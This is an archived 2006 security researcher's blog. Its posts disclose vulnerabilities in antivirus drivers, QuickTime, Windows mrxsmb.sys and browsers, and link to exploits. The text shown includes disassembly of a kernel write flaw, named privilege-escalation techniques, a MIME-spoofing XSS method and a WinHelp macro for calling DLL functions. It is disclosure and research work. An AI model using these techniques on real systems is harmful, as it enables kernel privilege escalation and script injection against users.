SP2. Change winsrv.dll data section address (MAGIC_VALUE) if you want to add support to other versions. Download Exploit (in C) Download video " Csrss.exe Double-Free - Arbitrary DWORD overwrite " Music: "William Tell Overture (Abridged)" Album: Soundtrack - A ClockWork Orange.

To be continue...
(Thursday, 16 November 2006) Written by Rubén
Updated: CA has addressed this issue. Hi Today, I am going to bypass my own disclosure policy. The reason is that I've notified the vendor, in this case Computer Associates , but no response. I was thinking about that issue was not important for them, when suddenly I heard a voice in my head saying : "share the knowledge or die like a dog!"... I had no chance. Btw, CA sirs: people use to reply, at least, with "thanks for your email" a.k.a "good manners" . This issue is some similar to the Kaspersky flaw.Summing up: unprivileged users executing arbitrary code with kernel privileges. I am wondering if driver signing,one of the new improvements of Vista, includes a security audit in the cost...If not so, rootkits will be with us forever and ever taking into account the current amount of flaws present in security products. Download Advisory "CA HIPS Drivers - Multiple Privilege Escalation Vulnerabilities" Exploits (For educational purposes only - No modifications allowed) Download Exploit #1 (Kmxfw.sys Driver) Download Exploit #2 (Kmxstart.sys Driver) + Movie of the Month: 12 Angry Men Year: 1957. Directed By: Sydney Lumet + Song of the Month: "Jo Ta Ke" Band: Su Ta Gar Album: "Jo Ta Ke" + Canvas of the Month: Bouquet de soleils Artist: Claude Monet + Animation of the Month: Kiwi Artist: Dony

News
(Thursday, 19 October 2006) Written by Rubén
Updated Kaspersky has released its own advisory. http://www.kaspersky.com/technews?id=203038678 Hi all! I've got a lot of news for posting but "step by step" will be better. Firstly, Kaspersky has just addressed a privilege escalation vulnerability which I discovered few weeks ago. I am unable to locate an advisory from Kaspersky so I am wondering whether they are going to release something on this issue or not. Summing up the vulnerability: Unprivileged users can execute code with kernel privileges Download Advisory "Kasperksy NDIS-TDI Hooking Engine Drivers Privilege Escalation" Exploits (For educational purposes only) Download exploit #1 (KLICK Driver) Download Exploit #2 (KLIN Driver) References: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=425 Reversemode News I am updating contents, fixing minor errors within the papers, changing their appearance and so on. For example, an improved version of the paper titled " Generic Detection And Classification of Polymorphic Malware Using Neural Pattern Recognition " is available. From now on, each document will be released using a template according to its contents. Before 2007 the entire collection of documents should be migrated to the "new look" as well as revised and improved. I want a quality R&D section, so I am putting efforts into researching innovative stuff. We'll see the results. I think that R&D was the past, is the present and will be the future. We cannot be repeating the same errors forever and ever. We should start to do the right thing, shouldn't we? Finally, the corporate website is up, however still "under construction". Upcoming projects and news were needing it.Check it out at http://corporate.reversemode.com Greets, Rubén.

Hunting for Symantec
(Thursday, 05 October 2006) Written by Rubén
Hi! During this year I have published advisories for well-known vendors like Microsoft,Apple,Intel...before ending 2006 some of them will repeat, and new ones will join to the party. Today, is the day for Symantec. The entire family of Symantec and Norton products for Microsoft Platforms are prone to a local privilege escalation vulnerability. Two Device Drivers are affected: NAVEX15.sys and NAVENG.sys. NAVEX15.sys #LOW VALUES PAGE:0004B611 sub edx, 222AD3h PAGE:0004B617 push esi PAGE:0004B618 jz short loc_4B63C loc_4B63C: mov edx, [ecx+3Ch] PAGE:0004B63F test edx, edx PAGE:0004B641 jz short loc_4B653 PAGE:0004B643 push 4 PAGE:0004B645 pop esi PAGE:0004B646 cmp [eax+4], esi PAGE:0004B649 jnz short loc_4B653 PAGE:0004B64B mov dword ptr [edx], 200h // No check EDX= controlled. #HIGH VALUES PAGE:0004B61A push 4 PAGE:0004B61C pop esi PAGE:0004B61D sub edx, esi PAGE:0004B61F jnz short loc_4B653 PAGE:0004B621 mov edx, [ecx+3Ch] PAGE:0004B624 test edx, edx PAGE:0004B626 jz short loc_4B653 PAGE:0004B628 cmp [eax+4], esi PAGE:0004B62B jnz short loc_4B653 PAGE:0004B62D mov dword ptr [edx], offset sub_4B71B //No Check EDX= controlled. So, after thinking for a while, I have decided to release public exploit code for these flaws, in order to show that every kernel memory overwritting can be exploited, even if we are not controlling the values. How? + Non-controlled: High values Overwritting MmUserProbeAddress, thus we can modify the range accepted by ProbeForWrite so a bunch of IOCTLs from different drivers will become very useful. The following exploits implement this method.You will need admin privileges, since the Shadow Device (mrxsmb.sys) is used to generate values. For educational purposes ONLY. Download exploit #1 Download exploit #2 Download exploit #3 Download exploit #4 + Non-controlled: Low values Overwritting NtQuerySystemInformation Switch Table: ff248500cb5780 jmp dword ptr [nt!NtQuerySystemInformation+0xe08 (8057cb00)+eax*4] The following exploits implement this method. No special privileges are needed.For educational purposes ONLY Download exploit #1 Download exploit #2 The exploits have been successfully tested on XP SP2 and 2K SP4 fully patched. Download Advisory "Symantec Antivirus Engine Privilege Escalation" References: http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05a.html http://www.idefense.com/intelligence/vulnerabilities/display.php?id=417

Insecure Browsers
(Wednesday, 27 September 2006) Written by Rubén
I would like to comment some insecure actions performed by widely extended Browsers like IE,Firefox and Opera. These flaws,or insecure features, could lead to a XSS,Phishing or other "Identity Theft" attacks. ::Issue #1:: GZ files - insecure handling Affected Firefox & Opera Both Browsers are rendering automatically .gz files using the Content-Type sent by the server.On the other hand, IE prompts the "Download" Dialog to the user, that's right. This insecure file handling can lead to a XSS attack, indeed I have conducted a real-life attack (legally of course) against a known hosting company, which had the perfect enviroment for the attack. How does this attack work? The scenario would be as follows: Server-side: Insecure " AddType " settings for gz files. I.e text/html Client-side: A Victim clicking directly on a link to a gz file, instead of " Save as ". Actually, a high percentage of users will click directly. Attacking : + An internal control panel or corporate application, which allows to the user to download its server logs compiled as a ".gz" file. + The link that the user follows is pointing directly to the ".gz" file. + The Content-type sent by the server is " text/html ". If the user clicks the link, using Firefox or Opera, the .gz file will be rendered as "html" since the Browser is trusting on the Content-Type sent by the server.Thus,if we have been poisoning the log with XSS attack traces ("brute-forcing" arbitrary urls with XSS scripts), the final result is those malicious scripts executing within the context of the Admin/User. Since the attack relies on a previous insecure scenario,the attack is not so easy to perform, however it has had success on a real-life situation. ::Issue #2:: MIME Spoofing Affected Firefox & Opera & IE If a proper Content-type is sent from server-side, those browsers did not perform any MIME-sniffing,rendering the file as the server rules.This situation could lead to a XSS, Phishing or Exploit-based attack. How? Let's see an example Modifying .htaccess in order to alter the Content-Type of a well-known extension. e.g. JPG files. AddType text/html .jpg Using a specially crafted image,which hides a malicious script/html within its Comment Chunk, we could fool the user. Even if the victim uses "Save as" option instead of opening directly the image file (http://...../exploit.jpg),he/she will see a valid image file. A lot of users would click a link with a .jpg extension, however perhaps the .html seems to be more dangerous. It is known that those Browsers are implementing MIME-sniffing, but clearly, not correctly. The Browser should display a warning about the mismatching, at least if well-known extensions (jpg, gif, png...)are involved. Please note that while browsing (extensions != file formats), we are agree on that.We could configure a .jpg extension in order to execute itself as a php script, but we are not talking about that situation, we are focusing on a valid file with a valid extension but using a Content-Type spoofed. The following proof of concept is provided: http://mimespoofing.reversemode.com/exploit.jpg The PoC does not contain any malicious code, just an alert().

Waiter, there's a bug in my apple !
(Tuesday, 12 September 2006) Written by Rubén
Hi ! Today's dinner is a QuickTime FLIC File Heap Overflow Advisory. Quicktime is really horrible on security. Actually, it is a fact not a point of view. I have lost the count of the exploitable vulnerabilities discovered this year. A security update for Quicktime fixed more than twenty flaws, so I thought "hey, I want my piece of cake too!" and here is the result. Mike Price of McAfee AVERT Labs, also spotted this flaw. The flaw is remotely exploitable if the attacker tricks the victim to visit a malicious webpage with the exploit embedded. I have released a PoC for testing and educational purposes only. This poc is not an exploit, do not email me requesting an exploit. If you are planning to use this PoC in order to build an exploit-spyware-financial-crap-downloader, I hope you die. Downloads: Download Advisory "Apple Quicktime FLIC/CEL File Heap Overflow" Download PoC References: http://docs.info.apple.com/article.html?artnum=304357 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=413 Talking about other issues, on December the european Magazine for developers using Microsoft Platforms "MsCoder" , will publish an article of mine. The article will focus on Windows Kernel and Drivers. Finally, Reversemode's first anniversary is coming! (November). There will be a lot of surprises ;) stay tuned! Greets, Rubén.

F-Secure Reverse Engineering Challenge
(Monday, 07 August 2006) Written by Rubén
update Thanks to Era for the translation: salasana - password (literally "secret word") sanakirja - dictionary (lit. "word book") resurssien uudelleenallokointi - resource reallocation toimintaprosessi - process of execution laajakaista - broadband hilavitkutin - gizmo tutkimus ja tuotekehitys - research and development vempele - thingy ryokale - rascal (roughly) (properly "ryökäle") paukapaa - idiot (roughly) (properly "paukapää") kaistapaa - crackpot (properly "kaistapää"; lit. "lane head") lurrjus - rascal (properly "lurjus") hunsvotti - scoundrel (roughly) Last Friday started F-Secure Reverse Engineering Khallenge . Finally, just 16 have had success solving it. I was the number six. I really enjoyed reversing the three files, however the last one was the funniest executable that I have ever reversed . It was a numerical maze. For those who tried the challenge but unfortunatly did not solve it , here is my brief analysis. LEVEL 1 Obviously the password is obvious :) push 0 ; lpUsedDefaultChar push 0 ; lpDefaultChar push 0 ; cchMultiByte push 0 ; lpMultiByteStr push 0FFFFFFFFh ; cchWideChar push offset WideCharStr ; "The password is obvious" push 0 ; dwFlags push 0 ; CodePage call esi ; WideCharToMultiByte It is a very usual trick in HackIt's, Challenges... LEVEL 2 Chained Words. .data:00407034 ; "salasana" .data:00407038 dd offset aSanakirja ; "sanakirja" .data:0040703C dd offset aResurssienUude ; "resurssien uudelleenallokointi" .data:00407040 dd offset aToimintaproses ; "toimintaprosessi" .data:00407044 dd offset aLaajakaista ; "laajakaista" .data:00407048 dd offset aHilavitkutin ; "hilavitkutin" .data:0040704C dd offset aTutkimusJaTuot ; "tutkimus ja tuotekehitys" .data:00407050 dd offset aVempele ; "vempele" .data:00407054 dd offset aRyokale ; "ryokale" .data:00407058 dd offset aPaukapaa ; "paukapaa" .data:0040705C dd offset aKaistapaa ; "kaistapaa" .data:00407060 dd offset aLurrjus ; "lurrjus" .data:00407064 dd offset aHunsvotti ; "hunsvotti" We had to make up a word being present in the above table, in addition going forward 5 characters within that word, another valid word had to be present. Just like a child game. Solution: “laajakaistapaa” (laajakaista + kaistapaa) Btw, What is the meaning of these words? I guess that is Suomi. LEVEL 3 The fun starts The password is the path you have to follow in order to reach the Goal. As in every maze, UP, DOWN, LEFT or RIGHT are valid movements. In this case, UP is defined by 2 (0x32) + 0x1D DOWN is defined by 8 (0x38) – 0x1D LEFT is defined by 4 (0x34) - 1 RIGHT is defined by 6 (0x36) + 1 Well, I have coded a tiny game titled "Assemblyrinth". This game is based on this level. If you have a look at the source code, you will find the solution, an algorithm which propagates the maze and few surprises :) Download Assemblyrinth. (in C)

Intel PROset/Wireless security update
(Saturday, 29 July 2006) Written by Rubén
Intel has addressed the Intel PROset/Wireless security issue which I posted to bugtraq few months ago. According to Intel: "Applications written to the Intel® PRO/Wireless Network Connection Software API which utilize the API to apply WLAN profiles are also affected by this vulnerability. Intel recommends customers contact their OEM for an updated version of the OEM's WLAN application." Intel's Advisory: " Intel® PROSet/Wireless Software Local Information Disclosure "

Optoelectronic for Fun and Profit
(Monday, 17 July 2006) Written by Rubén
"Sometimes, when the night is dark and cold, I hear a voice in my head saying: Phototransistors will rule the world, be careful. Kill'em all. Mmmmmm coookieeesss! " . George W.Bush. Before the last phototransistor will be destroyed by Bush, I will try to explain how I made up a home-made remote control for my laptop using only recycled materials. Here we go! Wikipedia : Phototransistor is in essence nothing more than a bipolar transistor that is encased in a transparent case so that light can reach the base-collector junction. The phototransistor works like a photodiode, but with a much higher sensitivity for light, because the electrons that are generated by photons in base-collector junction are injected into the base, this current is then amplified by the transistor operation. A phototransistor has a slower response time than a photodiode however. Summing up, a phototransistor/photodiode takes light and returns pulses. Cool! - Where can I find one of those? Inside a mouse, an old VHS player...Any machine that supports remote control is prone to include a photodetector. Hands on! This is my old AIWA VHS Player. I still remember when my parents bought it. I could not believe it! I had a VHS Player! but years later, the DVD came into play and the VHS was abandoned. Actually, the VHS was not a good video format, but the marketing and markets brought it to the top. So, my life is not going to change whether I extract the phototransistor from the videoplayer or not, so I did. You should find the display and likely the phototransistor will be close to it. Maybe, as in this case, "caged" inside a metal box. This is our small "treasure". Maybe you are wondering why this phototransistor has only Collector and Emitter and does not have Base, however that is not exactly true. The Base is encapsulated, in fact it is the radiation brought by the photodiode, which is part of the phototransistor. -Well, but how can I connect this phototransistor to my laptop?- Pretty simple, using the Microphone Input. The pulses emitted by the Phototransistor will be captured by the SoundCard, so then we have the "connection-mechanism". You can use a microphone or a headphones, I used the last ones. Just join the wires to the Collector and the Emitter as follows. You should use a wrapper, in this case, it is just a old display without the liquid-crystal. Testing it Well, the problem that we want to solve is,for instance, to turn off the computer automatically. Our Phototransistor is sensible to light changes and infrared light so, being in bed close to fall in the arms of Morpheus (The God of the Dreams, not Laurence Fishburne), we could choose to activate the shutdown- mechanism, turning off the light or using the remote control. The following video shows the output of "/dev/dsp" (default sound I/O device in Linux) in real-time when I turn on/off the light (waveform ascii characters versus static pattern) and when the original remote control is used(static pattern versus strange characters appearing suddenly). Seeing the output, a simple shell script solves the issue. Obviously, more advanced output handling could be done,implementing a highly-customizable home-made remote control system. Download Video Music: " Woo Hoo ", The 5.6.7.8's - KillBill. Volume 1 SoundTrack- Duration: 2 min. Try it yourself!

Gabriel's www.advansen.com. Paper "Useful Polymorphism in C"
(Friday, 07 July 2006) Written by Rubén
Gabriel, who runs www.advansen.com , has released a paper titled " Useful Polymorphism in C ". Watch out! he is talking about OO polymorphism. Very interesting paper. Download Link Congratulations Gabri!

Fresh Bugs
(Tuesday, 13 June 2006) Written by Rubén
Update 15.06.2006 Copy&paste from an email that I have posted to bugtraq: Hi, Just to confirm that Microsoft has not fixed the NtClose/ZwClose DeadLock vulnerability. The bulletin MS06-030 addressed this flaw as "SMB Invalid Handle Value" which is just an euphemism under my point of view. The code added to mrxsmb.sys is just a wrapper in order to avoid the "Invalid Handle". I am sure that Microsoft has its own reasons to do this, I do not care about. I'm not interested in discussing. However, I think that the Driver Developer community should be informed that using NtClose/ZwClose, the driver will be exposed to a security issue by default. If this issue is considered as a feature, please, document it. A developer is not extrictely required to know this behaviour. ------ case IOCTL_CLOSEHANDLE_DEADLOCK: inBuf = Irp-> AssociatedIrp.SystemBuffer; ZwClose((HANDLE)inBuf[0]); ------ Microsoft has updated the Acknowledgments section in the security bulletin MS06-030, it had not credited me by a misunderstanding. Brian Kebs wrote a little comment about this issue on his WashingtonPost Blog . Thanks to all that have e-mailed me regarding papers published. Gracias a toda la gente que me ha escrito en relación a los papers publicados. 14.06.2006 The paper " Generic Detection And Classification Of Polymorphic Malware Using Neural Pattern Recognition " is currently available. During hours a wrong version has been uploaded but now is the rigth version. However,it is just an initial release which will be completed and improved.Experimental Results obtained are based on Morphine Polymorphic Packer/Cypher Abstract The obsolete way in which some anti-virus products are generating malware signatures, is provoking that polymorphic malware detection becomes a tedious problem, when actually it is not so hard. This paper describes the basics of a method by which the generic classification of polymorphic malware could be considered as a trivial issue. I'm back with fresh news. Microsoft has just released the Security Bulletin for June, which addresses two vulnerabilities that I found past year.Thanks to Microsoft for not credit me in the bulletin, just iDefense has been credited. Mode Irony off. The root of both two vulnerabilities is the Microsoft Server Message Block Redirector Driver (mrxsmb.sys). One of them, could allow to any user to execute Ring0 code. The second one, is not only a problem of the driver as Microsoft says in the bulletin, the flaw is inside the Kernel Object Manager. The flaw is a deadlock that could allow to any process to become unkillable. The issue is that this deadlock is triggered through mrxsmb.sys. I have not tested the fix but it would be so nasty to have fixed just the driver, "avoiding" the Kernel... Download Paper -" Reversing Mrxsmb.sys. Chapter I "Getting Ring0" - Download exploit Download Paper - "Reversing Mrxsmb.sys. Chapter II "NtClose DeadLock" - Download exploit Kartoffel is now released.You can test these vulnerabilities using it. The user's guide is included in the zip file. Source code and executable versions are also included Download Kartoffel v1.0 Kartoffel in action, detecting the privilege escalation previously explained.

Microsoft Infotech Storage Library Heap Corruption
(Tuesday, 09 May 2006) Written by Rubén
Microsoft Infotech Storage System Library is prone to a heap corruption vulnerability. This issue is due to the failure of the library to properly check a specially crafted CHM file. The successful exploitation of this flaw would allow to execute arbitrary code. Itss.dll is the system library, which deals with CHM/ITS format. Microsoft rates the CHM file format as potentially dangerous,similar to an executable file. Nevertheless, this flaw is triggered just decompiling the malicious CHM file (using hh -decompile), thus malicious attackers could trick users to perform this operation or even, advanced users or researchers could attemp to decompile before opening it. Microsoft plans to address this issue in the next Service Pack. Due to this fact, users of certain Windows versions should implement their own protection mechanism. Download Advisory Download Proof Of Concept

Where is my WEP?
(Tuesday, 02 May 2006) Written by Rubén
Update Intel's Advisory: " Intel® PROSet/Wireless Software Local Information Disclosure " Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe. It is a service which is part (at least) of the Intel PROset/Wireless software . This application is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets. This service uses a shared memory section which is created without the proper security descriptor, allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The section is named “S24EventManagerSharedMemory” This shared memory is used to store ,in plain text, confidential information like WEP Key, Passwords... The successful exploitation of this vulnerability could allow to any unprivileged user to access confidential information,exposing the network. An important mitigating factor is that the vulnerability is local, nevertheless some Malware could take advantage of this flaw. Download Exploit (c source code)

Sehuk, my strange length disassembler engine.
(Tuesday, 07 February 2006) Written by Rubén
Update 19/04/2006 - Upcoming article In July, the IT Security Magazine "Hakin9" ( www.hakin9.org ) will publish an article of mine. Summing up, it comprises: Hooking methods Implementation of the Sehuk LDE and Congrio Malware analysis using these tools 11/02/2006 - New Release. v.02 [-] Added initial Call and Jcc/Jmp emulation. Here is Sehuk, my 0xF2 (and growing) bytes length, length disassembler engine. It is mainly oriented toward Detour hooking or just hooking. I have coded a renewed version of a tiny old program in order to release the Sehuk Engine VC++ Asm Inline version.This app, named "Congrio", could be considered as "universal" hooker (with a lot of imagination). The goal of Congrio is to provide a fast method to deal with packed malware. For instance, if we hook ExitProcess the classification of certain packed malware becomes trivial (as the Video-Example shows), even if it is packed with an unknown packer. Another possible scenario could be when packed malware uses process injection or it remains few tenth of seconds in memory, Congrio is very useful in this case. It diverts the execution flow, thus the hooked process is "politely" invited to sleep during a defined interval. VC++ Asm Inline and nasm ( http://www.kernel.org/pub/software/devel/nasm/ ) versions are currently availabe. Download Video showing the basics of congrio.The target is one of the real malware (packed with svkp 1.3x) selected for the CSRRT-LU malware contest . Music by Clint Mansell - Requiem for a dream (Orchestral version) Duration 12:24 In castilian language. En castellano. Download Congrio (includes Sehuk v.02 -VC++ Asm Inline- ). Also available from "Downloads"-> "Sehuk & Congrio" Download Sehuk Engine v.02(Proof of concept. Asm version -nasm-). Also available from "Downloads"-> "Sehuk & Congrio"

Mozilla/Firefox & Adobe, "embedded" problems
(Thursday, 02 February 2006) Written by Rubén
There is a "mutual imcompatibility" between Adobe PDF reader plugin and Mozilla/Firefox browsers. Embedding two or more pdf documents using mPluginType == nsPluginType_Real) { if (sInMessageDispatch && (msg == sLastMsg)) { #ifdef DEBUG printf("Dropping event %d for Real on the floor\n", msg); #endif return PR_TRUE; // prevents event dispatch } else { sLastMsg = msg; // no need to prevent dispatch } } The bug has been reported. You can test it here http://www.reversemode.com/pdfbug/poc.html

Winamp 0Day exploit
(Monday, 30 January 2006) Written by Rubén
It seems that somebody has released a 0Day exploit for the widely extended multimedia player,WinAmp. I found the vulnerability more ore less one month ago, as the iDefense advisory shows. Update The Winamp team don´t care about the security of their customers. The common sense tell me "Watch out! do not disclose this vulnerability before a patch, if not,it will permit that adware-spyware-spam-scam mafia to make more money,even.They are earning a lot of money just deceiving people. It is also known as savage capitalism. There are circumstances where a 0Day exploit has meaning,at the present day if somebody releases a 0Day exploit for software like Winamp, it will only benefit to all that scum. What happened with WMF? I guess that some researchers should reflect at great lenght before disclosing any unpatched vulnerability. Perhaps you will not get your 5 minutes of "fame" but we should act beyond our ego.

Please do not "hlp" me!
(Sunday, 22 January 2006) Written by Rubén
How in the world could the Microsoft Engineers feel like to develop dangerous file formats? I mean code and data mixed, I do not know but they did it. The most spreading "vulnerability" known ever, the WMF issue, was directly caused by one these "funny" file formats. But WMF is not alone... WinHelp File format, aka .hlp , is another example of an old and extreme dangerous mixed format. The WinHelp format was born with Windows 3.1 and is still supported at the present day by Windows 2000, Windows XP ... In addition it is actively used by Microsoft and third-party software to delivery help documentation. The WinHelp file format is the most similar to an executable file not being one. Even, several virus infect this format due to the powerful scripting language. One of the documented macros supported by this format is "RegisterRoutine". Using this macro we can register any function of any Dll [CONFIG] RegisterRoutine("Kernel32.dll", "Beep", "UU") then the function can be used as any other defined Macro within the WinHelp project {\uldb Do Beep}{\v !Beep(750, 5000)} Microsoft released a Security update addressing the issue.Before it .hlp files could be loaded by Iexplorer using hhctrl.ocx (winhelp command), so any code could have been executed. But now is different, remote execution is not possible, although the Macro support is still active locally. There are few fully trusted formats and hlp is not one of them so I think that it would not be used to delivery documentation. HLP STOP!

NetStasi
(Saturday, 07 January 2006) Written by Rubén
Yesterday, surfing the MSDN I discovered the embedded Visual C++ and the SmartPhone,Pocket PC SDKs. Each SDK includes a nice emulator and multilingual images are also available so you can inmediatly begin to develop software. I have neither Pocket Pc device nor Smartphone so it is very useful for me :) In order to learn more about Pocket PC, I have coded a very very simple network scanner, NetStasi. The only feature is to ping machines within a desired ip range, when a machine is up, NetStasi will try to connect to port 23 and display data received. Just for fun. Download NetStasi EVC++ Proyect (GPL) from "Files"-> "Pocket PC". Download Embedded Visual C++